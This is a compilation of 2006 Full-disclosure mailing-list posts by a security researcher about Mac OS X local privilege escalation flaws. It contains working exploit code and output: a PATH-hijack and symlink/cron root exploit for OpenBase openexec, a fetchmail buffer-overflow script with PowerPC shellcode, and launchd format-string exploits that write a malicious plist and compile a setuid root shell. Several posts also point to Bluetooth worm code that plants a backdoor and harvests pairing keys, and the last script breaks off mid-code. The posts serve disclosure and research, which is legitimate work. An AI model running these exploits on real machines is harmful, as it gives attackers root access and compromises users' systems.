'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?
From the attackers standpoint the exploitation is fairly quick and simple. Our
example uses a local root exploit however this tactic
could easily be applied to any existing malware technique that Intego
VirusBarrier protects against. Code could in theory be run as a
precurser to an InqTana attack as a means to bypass the Intego protection. The
existing signatures for InqTana A B C and D would
then be completely useless and an E variant would be born.
virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl Pwntego.sh README.txt pwntego.uu rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel),
81(appserveradm), 79(appserverusr), 80(admin)
rm:
[Full-disclosure] OpenBase SQL multiple vulnerabilities Part Deux
DMA[2006-1107a] - 'OpenBase SQL multiple vulnerabilities Part Deux' Author: Kevin Finisterre Vendor(s): http://www.openbase.com Product: 'OpenBase SQL =10.0 (?)' References: http://www.digitalmunition.com/DMA[2006-1107a].txt Description: (regurgitation warning - this may taste VERY familiar) For over a decade, the OpenBase family of products have been enabling some of the most innovative business applications at work today. With thousands of customers worldwide, OpenBase has become a brand that companies can rely on. OpenBase customers include ATT, Adobe Systems, Canon, Walt Disney, First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image and many other innovators worldwide. As mentioned previously several setuid root binaries from OpenBase SQL are placed in /Library/OpenBase/bin during the installation of WebObjects support for Xcode or during a standard OpenBase install. In this particular instance we will be dealing only with the openexec binary. pwnercycles-ibook:/tmp pwnercycle$ ls -al /Library/OpenBase/bin/openexec -rwsrwsr-x 1 root admin 189544 Jan 13 2005 /Library/OpenBase/bin/openexec The openexec binary makes poor use of its setuid privileges when calling various helper binaries such as: cp, rm and killall. Each of the mentioned binaries winds up being called while openexec is running as root. Using the PATH environment variable it is possible to influence openbase in a manor that forces it to call the various helper binaries from a location of the attackers choice. Manipulating openexec via its path is an easy way for an attacker to obtain root. pwnercycles-ibook:/tmp pwnercycle$ ./openexec_duh.pl Usage: ./openexec_duh.pl target Targets: 0 . cp - /Library/OpenBase/bin/openexec -install 1 . killall - /Library/OpenBase/bin/openexec -kill 2 . rm - /Library/OpenBase/bin/openexec -uninstall pwnercycles-ibook:/tmp pwnercycle$ ./openexec_duh.pl 1 *** Target: killall - /Library/OpenBase/bin/openexec -kill /bin/cp /tmp/finisterre /tmp/killall sh-2.05b# id uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin) The next issue with the openexec binary results in an attacker being able to place a root owned and world writable file anywhere on the target file system. Again the end result is a local root compromise, in this case a little cron nastiness is required. When an openexec instance starts a log is written to /tmp/output. Unfortunately when this log file is created openexec takes no objections to a symlink in place of the filename. A symlink can point to virtually anywhere on the filesystem so an attacker has many options at his disposal. In most cases being able to create a file alone will not get you root access. The proper umask and a crafty file location can make all the difference in the world in some instances. Having the ability to place a root owned file with rw-rw-rw- permissions anywhere on the filesystem is quite powerful. On Linux based systems writing to /etc/ld.so.preload has proven to be a reliable exploitation path to obtain root. Apple's OSX unfortunately has no such facility to abuse. After some research the most expediant way I could come up with to obtain root via rw-rw-rw- file creation was cron abuse. On a vanilla install of OSX there are no tabs in /var/cron/tabs, nor is cron even running. In order to exploit the cron facilities we must have the cron daemon running. Fortunately the crontab -e command kicks off /usr/sbin/cron after a valid crontab is saved. pwnercycles-ibook:/tmp pwnercycle$ ps -ax | grep cron 2340 p4 R+ 0:00.00 grep cron pwnercycles-ibook:/tmp pwnercycle$ ls /var/cron/tabs/ pwnercycles-ibook:/tmp pwnercycle$ crontab -e crontab: no crontab for kf - using an empty one crontab: installing new crontab pwnercycles-ibook:/tmp pwnercycle$ ps -ax | grep cron 2344 ?? Ss 0:00.01 /usr/sbin/cron 2346 p4 R+ 0:00.00 grep cron pwnercycles-ibook:/tmp pwnercycle$ ls /var/cron/tabs/ pwnercycle According to the man page 'cron checks each minute to see if its spool directory's modtime (or the modtime on /etc/crontab) has changed, and if it has, cron will then examine the modtime on all crontabs and reload those which have changed. Thus cron need not be restarted whenever a crontab file is modified'. Wow how perfect is that! 1.) crontab -e to start cron 2.) create /var/cron/tabs/root 3.) wait 1 minute 4.) enjoy root shell. pwnercycles-ibook:/tmp pwnercycle$ ./openexec_createfile.pl Usage: ./openexec_createfile.pl target Targets: 0 . OpenBase10.0.0_MacOSX.dmg pwnercycles-ibook:/tmp pwnercycle$ ./openexec_createfile.pl 0 *** Target: OpenBase10.0.0_MacOSX.dmg /Library/OpenBase/bin/openexec deactivating OpenBase Service No matching processes belonging to you were found No matching processes belonging to you were found No matching processes belonging to you were found /var/cron/tabs/root should
[Full-disclosure] Machoman / Macarena virus for OSX
Since most of the reporting out on OSX.Macerena is fairly minimal I thought I would point everyone to the original tutorial and PoC code by Roy G Biv of 29A incase you missed it. http://vx.netlux.org/lib/vrg01.html -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] hack.lu Bluetooth demo
As requested by several of the folks that went to hack.lu - 2006 I have posted the code for the 'GenerationTwo' InqTana variant at http://www.digitalmunition.com/hacklu.html For those that missed it Thierry Zoller of nruns demonstrated a remote exploitation of CVE-2005-1333 as a means to compromise both a Bluetooth enabled 10.3.9 Macintosh (that has not been patched to APPLE-SA-2005-03-21 and APPLE-SA-2005-05-03) and anything that it was paired with. The variant also works on 10.4 machines that have not been patched with the Mac OS X 10.4.1 and Mac OS X 10.4.7 Updates. Post-compromise the 'GenerationTwo' variant installs a malicious /etc/ttys file with a login getty listening on a Bluetooth rfcomm channel. A user is added and a setuid backdoor is left behind for easy root access over a Bluetooth rfcomm connection. The final steps of exploitation invole the harvesting of any available link keys (via KeyHarvest.pl) from blued.plist so that other devices may also be exploited. Much thanks to both Thierry Zoller and the organizers of Hack.lu. If you have any questions about GenerationTwo feel free to ask. Please keep in mind that CVE-2005-1333 was patched almost one and a half years ago at this point so I would say that you SHOULD be patched to this by now. If you are pen-testing older Macs make sure you check for Bluetooth! -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] HP Tru64 dtmail bug - Really exploitable?
Where were the politics? I was simply stating the facts. -KF Politics should be avoided at all costs. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NETRAGARD-20060624 SECURITY ADVISORY] [ROXIO TOAST 7 TITANIUM - LOCAL ROOT COMPROMISE ]
Propaganda Support wrote: On Aug 22, 2006, at 3:22 PM, K F wrote: the admin users on OS X can NOT become root at any time. Yes, they can. Um NO they can't. ANY is a pretty strong word. The admin user must first know the admin password before becomming root. Obviously. An admin user who doesn't know the admin password is not an admin user. He/she is a different user using an admin user's account. You just validated my point... without the admin password an admin user can not become root. Thus they can not 'become root at any time'. A person who has access to an admin session may not become root until the admin password becomes known. I am physically sitting on a mac that I do not know the admin password to right now... when I typed 'id' it says I am in the admin group... there for I am an admin period regardless of if I know the password my gid=admin. If you want to get trivial over wording that is fine... bottom lines while sitting at someone elses terminal that is logged in as admin you too are an admin as far as the OS is concerned. Based on the info below ANYONE that sits down at your pc while it is logged in can take advantage of the fact that you can take root WITHOUT a password using the technique outlined below. Not true. They must provide an admin password to use the Deja Vu pref pane, unless the admin user chose to leave it unlocked. (It's locked by default.) Well guess what... when you go to add a user account in System Preferences it asks you to unlock the panel. When you are done it locks it back for you. The next time you open System Preferences it is again locked and it wants a password... guess what Deja Vu does not do that. You unlock DejaVu it stays unlocked... Guess what that means the first time you sat down to use Dejavu and you clicked the little lock to make your changes... unless you explicitly locked it back (which being accustomed to OSX locking items back for you why would you?) you are now sitting with an unlocked Deja Vu panel. Thanks for helping isolate some of the actual issue. DejaVu does not re-lock control panel items unless explicitly told to do so Don't act like you have never let someone use a web browser or log into instant messenger on your computer before... I don't have to act like it, because I don't unless I trust the person completely. I have a guest account for anyone else. If you let people that you don't trust use your logged in admin account, you're asking for all kinds of trouble, whether or not you have Deja Vu installed. They could delete any/all folders within your Home folder, for example. Does it make a difference if it is someone that I DO trust? I trust my girlfriend... that does not mean I want her taking root on my Mac. I am also currious to know if anyone knows how to spoof the presence of the System Preferences window... I can run the binaries just fine as a normal user however there is some sort of check for the Preference Pane to actually be running. I wonder if a spoof could be used to bypass the need to actually unlock DejaVu. k-fs-computer-2:/Library/PreferencePanes/DejaVu.prefPane/Contents/Resources kf$ ./install_scripts This tool can only be run from within the Deja Vu preference pane. -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DMA[2006-0801a] - 'Apple OSX fetchmail buffer overflow'
DMA[2006-0801a] - 'Apple OSX fetchmail buffer overflow'
Author: Kevin Finisterre
Vendor: http://www.apple.com/
Product: 'Mac OSX =10.4.7'
References:
http://www.digitalmunition.com/DMA[2006-0801a].txt
http://www.digitalmunition.com/getpwnedmail-x86.pl
http://www.digitalmunition.com/getpwnedmail-ppc.pl
http://www.freebsd.org/cgi/query-pr.cgi?pr=83805
http://fetchmail.berlios.de/fetchmail-SA-2005-01.txt
http://www.securityfocus.com/bid/14349
Description:
fetchmail-SA-2005-01 states that 'In fetchmail-6.2.5 and older, very long UIDs
can
cause fetchmail to crash, or potentially make it execute code placed on the
stack.
In some configurations, fetchmail is run by the root user to download mail for
multiple accounts.'. The authors of fetchmail made patches for these issues
available
to the public on 2005-07-21.
In defiance of a 'very proactive approach to security' Apple's OSX remained
unpatched
for approximately one year after the vendor supplied patches were made
available.
Shortly after the vendor disclosure of this bug exploits were made available by
The
Mantis Project ([EMAIL PROTECTED]). Conicidentally a recent paper was written
about exploiting buffer overflows and this vulnerability was used as an
example:
http://packetstormsecurity.org/papers/attack/payload-rewrite_exploit.txt
As you may have guessed by now exploitation on OSX is fairly trivial for both
PowerPC
and x86 platforms. An attacker with local access can gain gid=6 (mail) and a
remote
attacker may gain root under certain conditions.
k-fs-computer:~ kf$ ls *pwnedmail*
getpwnedmail-ppc.pl getpwnedmail-x86.pl
On PowerPc things were pretty straight forward. Simply overwriting the $pc and
$lr
registers with the address of our stack based shellcode was enough to snag
egid=6. On
x86 we obviously have to deal with the NX based protection. As shown plenty of
times
in the past a non executable stack by itself is pretty useless. We can
overwrite the
$eip register with the address of system() and we are pretty much good to go. A
small
wrapper in /tmp can help finish the job and give us a shell with gid=6.
k-fs-computer:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost
-P 1234
Enter password for [EMAIL PROTECTED]:
sh-2.05b$ id
uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm),
79(appserverusr), 80(admin)
In some cases fetchmail is run by the root user so it may be possible to take
remote
root with this vulnerability under certain circumstances.
As a side note a previously undisclosed local vulnerability in fetchmail was
discovered
while documenting the above mentioned issue. Fetchmail no longer ships in a
setgid() configuration
so this information should be of minimal impact. It is worth noting since it
may impact non OSX
machines in a similar manor.
k-fs-computer:~ kf$ export PATH=/tmp/:$PATH
k-fs-computer:~ kf$ cat /tmp/uname
/usr/bin/id
/bin/sh -i
k-fs-computer:~ kf$ chmod +x /tmp/uname
k-fs-computer:~ kf$ /usr/bin/fetchmail -V
This is fetchmail release 6.2.5+IMAP-GSS+SSL+INET6
Fallback MDA: (none)
uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm),
79(appserverusr), 80(admin)
sh-2.05b$
This issue is caused by the following code snippet:
if (versioninfo)
{
...
/* this is an attempt to help remote debugging */
system(uname -a);
}
Both of the above problems are addressed by the latest Apple update.
Work Around:
Install the 2006-004 update
http://docs.info.apple.com/article.html?artnum=106704
http://docs.info.apple.com/article.html?artnum=61798
http://www.apple.com/support/downloads/
#!/usr/bin/perl
# getpwnedmail.pl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# This is a canibalized version of Kansas City POP Daemon Version 0.0 -
Copyright (c) 1999 David Nicol [EMAIL PROTECTED]
#
# kevin-finisterres-mac-mini:~ kfinisterre$ /usr/bin/fetchmail -p pop3
--fastuidl 1 localhost -P 1234
# Enter password for [EMAIL PROTECTED]:
# sh-2.05b$ id
# uid=501(kfinisterre) gid=501(kfinisterre) egid=6(mail) groups=6(mail),
81(appserveradm), 79(appserverusr), 80(admin)
#
# http://docs.info.apple.com/article.html?artnum=106704
use Socket;
use IO::Handle;
use IO::Socket;
$banner = fetchmail ppc exploit - OSX 10.4.7 8J135;
$sc = x 10 .
# * PPC MacOS X shellcode
# * ghandi [EMAIL PROTECTED]
\x7c\xa5\x2a\x79 . # /* xor. r5, r5, r5; r5 = NULL */
\x40\xa2\xff\xfd . # /* bnel shellcode */
\x7f\xe8\x02\xa6 . # /* mflr r31 */
\x3b\xff\x01\x30 . # /* addi r31, r31, 268+36*/
\x38\x7f\xfe\xf4 . # /* addi r3, r31, -268 ; r3 = path */
\x90\x61\xff\xf8 . # /* stwr3, -8(r1); argv[0] = path */
\x90\xa1\xff\xfc . # /* stwr5, -4(r1); argv[1] = NULL */
\x38\x81\xff\xf8 . # /* subi r4, r1, 8 ; r4 = {path, 0} */
Re: [Full-disclosure] Roxio Contact
You may try requesting to speak to someone from the Software Development / Engineering team... I am sure you already know about going round and round in an organization looking for a contact. -KF Simon Smith wrote: Does anyone have any contact information for Roxio? I called their technical support team and they had no idea who to submit vulnerability information to. -- Regards, Adriel T. Desautels SNOsoft Research Team -- Vulnerability Research and Exploit Development BullGuard Anti-virus has scanned this e-mail and found it clean. Try BullGuard for free: www.bullguard.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DMA[2006-0628a] - 'Apple OSX launchd unformatted syslog() vulnerability'
Just so no one feels left out...
-KF
#!/usr/bin/perl
#
# http://www.digitalmunition.com/FailureToLaunch-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# Much appreciation goes to John H for all kindsa random shit like exploiting
Veritas and other random things in the past
#
# core... where the hell are you fool.
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a
saved return addy with our shellcode address.
# This code currently overwrites a saved return addy with the stack location of
our seteuid() / execve() shellcode.
#
# This exploit will create a malicious .plist file for you to use with launchctl
# kevin-finisterres-mac-mini:~ kfinisterre$ launchctl load ./com.pwnage.plist
#
# In theory I guess you could also drop this in ~/Library/LaunchAgents
#
# This was tested against OSX 10.4.6 8l127 on a 1.25GHz PowerPC G4 and a
# 500mhz PowerPC G3 running 10.4 8A428
#
# kevin-finisterres-mac-mini:~ kfinisterre$ ls -al /sbin/launchd
# -rwsr-sr-x 1 root wheel 80328 Feb 19 04:09 /sbin/launchd
# kevin-finisterres-mac-mini:~ kfinisterre$ file /sbin/launchd
# /sbin/launchd: setuid setgid Mach-O executable ppc
#
# ./src/SystemStarter.c:374: syslog(level, buf);
#
#
http://developer.apple.com/documentation/Security/Conceptual/SecureCodingGuide/Articles/AccessControl.html
# Because launchd is a critical system component, it receives a lot of peer
review by in-house developers at Apple.
# It is less likely to contain security vulnerabilities than most production
code.
#
foreach $key (keys %ENV) {
delete $ENV{$key};
}
#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc =
\x7c\x63\x1a\x79 .
\x40\x82\xff\xfd .
\x39\x40\x01\xc3 .
\x38\x0a\xfe\xf4 .
\x44\xff\xff\x02 .
\x39\x40\x01\x23 .
\x38\x0a\xfe\xf4 .
\x44\xff\xff\x02 .
\x60\x60\x60\x60 .
\x7c\xa5\x2a\x79\x40\x82\xff\xfd .
\x7d\x68\x02\xa6\x3b\xeb\x01\x70 .
\x39\x40\x01\x70\x39\x1f\xfe\xcf .
\x7c\xa8\x29\xae\x38\x7f\xfe\xc8 .
\x90\x61\xff\xf8\x90\xa1\xff\xfc .
\x38\x81\xff\xf8\x38\x0a\xfe\xcb .
\x44\xff\xff\x02\x7c\xa3\x2b\x78 .
\x38\x0a\xfe\x91\x44\xff\xff\x02 .
\x2f\x74\x6d\x70\x2f\x73\x68\x58;
$writeaddr = 0xbcf8; # Saved Return addy from frame 3
$ENV{TERM_PROGRAM} = - . pack('l', $writeaddr) . pack('l', $writeaddr+2) .
x 1 . $sc ;
$format =
# make it more robust yourself... I'm lazy
# 0xbfff fe70
% . 0xbfff . d%112\$hn .
% . 0x3ed9 . d%113\$hn ;
open(SUSH,/tmp/aaa.c);
printf SUSH int main(){seteuid(0);setuid(0);setgid(0);system(\/bin/sh\);}\n;
system(PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c);
open(PWNED,com.pwnage.plist);
print PWNED ?xml version=\1.0\ encoding=\UTF-8\?
!DOCTYPE plist PUBLIC \-//Apple Computer//DTD PLIST 1.0//EN\
\http://www.apple.com/DTDs/PropertyList-1.0.dtd\;
plist version=\1.0\
dict
keyLabel/key
string . $format .
/string
keyProgramArguments/key
array
stringhttp://www.digitalmunition.com/string
/array
keyRunAtLoad/key
true/
/dict
/plist\n;
close(PWNED);
print open a new window and type - \launchctl load ./com.pwnage.plist\\n;
system(/sbin/launchd);
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DMA[2006-0628a] - 'Apple OSX launchd unformatted syslog() vulnerability'
You couldn't be more wrong if you called it a Canadian Goose!
-KF
#!/usr/bin/perl
# http://www.digitalmunition.com/FailureToLaunch.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is a practical application of Non Executable Stack Lovin -
http://www.digitalmunition.com/NonExecutableLovin.txt
#
# This code currently jumps into 0x181 via dyld_stub_close()
#
# This exploit will create a malicious .plist file for you to use with launchctl
# k-fs-computer:~ kf$ launchctl load ./com.pwnage.plist
#
# In theory I guess you could also drop this in ~/Library/LaunchAgents
#
# This was tested against OSX 10.4.6 8l1119 on a 1.5GHz Intel Core Solo
#
# k-fs-computer:~ kf$ ls -al /sbin/launchd
# -rwsr-sr-x 1 root wheel 161944 Feb 19 04:46 /sbin/launchd
# k-fs-computer:~ kf$ file /sbin/launchd
# /sbin/launchd: setuid setgid Mach-O universal binary with 2 architectures
# /sbin/launchd (for architecture i386): Mach-O executable i386
# /sbin/launchd (for architecture ppc): Mach-O executable ppc
#
# ./src/SystemStarter.c:374: syslog(level, buf);
# proactive security eh?
foreach $key (keys %ENV) {
delete $ENV{$key};
}
$writeaddr = 0xa0011163; # close()
#$writeaddr = 0xa00119f1; # cxa_finalize() (must wait 25 seconds or so if you
use this one)
$sc = (0x181);
# both of these arrays are put in size order due to the multiple writes via
unformatted syslog() call
# seteuid after thought... whoops...I had to move some shit arround to account
for this
@seteuid =
([$sc+2, $sc+4, $sc,$sc+6],
[0x5050, 0xb7b0, 0xc031, 0x80cd], );
# Write the following instructions to 0xa0011163 dyld_stub_close as well as
nemos execve() to 0x181
# mov$0x181,%eax
# jmp*%eax
#
@payload =
([$writeaddr+6, $writeaddr, $sc+12, $sc+16, $sc+28, $sc+22, $sc+26, $sc+24,
$sc+10, $sc+14, $sc+18, $sc+30, $writeaddr+2, $sc+20, $sc+8, $writeaddr+4],
# 0
[0x00e0, 0x11b8, 0x2f2f, 0x2f68, 0x3bb0, 0x50e3, 0x5353, 0x5454, 0x6850,
0x6873, 0x6d74, 0x80cd, 0x8111, 0x8970, 0xc031, 0xff01], );
$ENV{TERM_PROGRAM} = . .
# string of write address
pack('l', $payload[0][0]) . pack('l', $payload[0][1]) . pack('l',
$payload[0][2]) . pack('l', $payload[0][3]) . pack('l', $payload[0][4]) .
pack('l', $payload[0][5]) . pack('l', $payload[0][6]) . pack('l',
$payload[0][7]) . pack('l', $payload[0][8]) . pack('l', $payload[0][9]) .
pack('l', $payload[0][10]) . pack('l', $payload[0][11]) . pack('l',
$payload[0][12]) . pack('l', $payload[0][13]) . pack('l', $payload[0][14]) .
pack('l', $payload[0][15]) . pack('l', $seteuid[0][0]) . pack('l',
$seteuid[0][1]) . pack('l', $seteuid[0][2]) . pack('l', $seteuid[0][3]) ;
# lazy non looped length calculations
$pay1 = $payload[1][0];
$pay2 = ($payload[1][1] - $pay1 - 0x1 );
$pay3 = ($payload[1][2] - $pay1 - $pay2 - 0x1);
$pay4 = ($payload[1][3] - $pay1 - $pay2 - $pay3 - 0x1);
$pay5 = ($payload[1][4] - $pay1 - $pay2 - $pay3 - $pay4 - 0x1);
$pay6 = ($payload[1][5] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - 0x1);
$pay7 = ($payload[1][6] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
0x1);
$pay8 = ($payload[1][7] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
$pay7 - 0x1);
$pay9 = ($payload[1][8] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
$pay7 - $pay8 - 0x1);
$pay10 = ($payload[1][9] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
$pay7 - $pay8 - $pay9 - 0x1);
$pay11 = ($payload[1][10] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
$pay7 - $pay8 - $pay9 - $pay10 - 0x1);
$pay12 = ($payload[1][11] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - 0x1);
$pay13 = ($payload[1][12] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - 0x2);
$pay14 = ($payload[1][13] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - 0x2);
$pay15 = ($payload[1][14] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - 0x2);
$pay16 = ($payload[1][15] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 -
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - $pay15 -
0x3);
# seems I forgot the seteuid(0)
$pay17 = 0xff + $seteuid[1][0];
$pay18 = 0xff + ($seteuid[1][1] - $pay17);
$pay19 = 0xff + ($seteuid[1][2] - $pay17 - $pay18 ) ;
$pay20 = 0xff + ($seteuid[1][3] - $pay17 - $pay18 - $pay19 - 0x7ec8 - 0x270) ;
# Something is fucking this write up... subtracting 0x8138 seems to help
# The offset is off by 6 if you are trying to debug this in gdb
$format =
%. . $pay1 . d . %246\$hn .
%. . $pay2 . d . %247\$hn .
%. . $pay3 . d . %248\$hn .
%. . $pay4 . d . %249\$hn .
%. . $pay5 . d . %250\$hn .
%. . $pay6 . d . %251\$hn .
%. . $pay7 . d . %252\$hn .
%. . $pay8 . d . %253\$hn .
%. . $pay9 . d . %254\$hn .
%. . $pay10 . d . %255\$hn .
%. . $pay11 . d . %256\$hn .
%. . $pay12 . d .
